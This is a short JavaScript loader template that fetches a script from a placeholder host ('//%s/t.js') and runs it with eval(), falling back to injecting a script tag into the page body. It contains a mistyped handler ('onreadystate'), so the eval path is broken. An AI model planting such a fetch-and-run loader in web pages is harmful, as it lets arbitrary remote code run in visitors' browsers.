(function(){
    var t = "//%s/t.js";
    try {
	var xhr = new XMLHttpRequest();
	xhr.open("GET", t, true);
	xhr.onreadystate = function(){
	    if (4 == xhr.readyState) {
		eval(xhr.responseText);
	    }
	}
	xhr.send(null);
    } catch(e) {
	var s = document.createElement("script");
	s.src = t;
	s.type = "text/javascript";
	s.defer = s.async = 1;
	document.body.appendChild(s);
    }
})();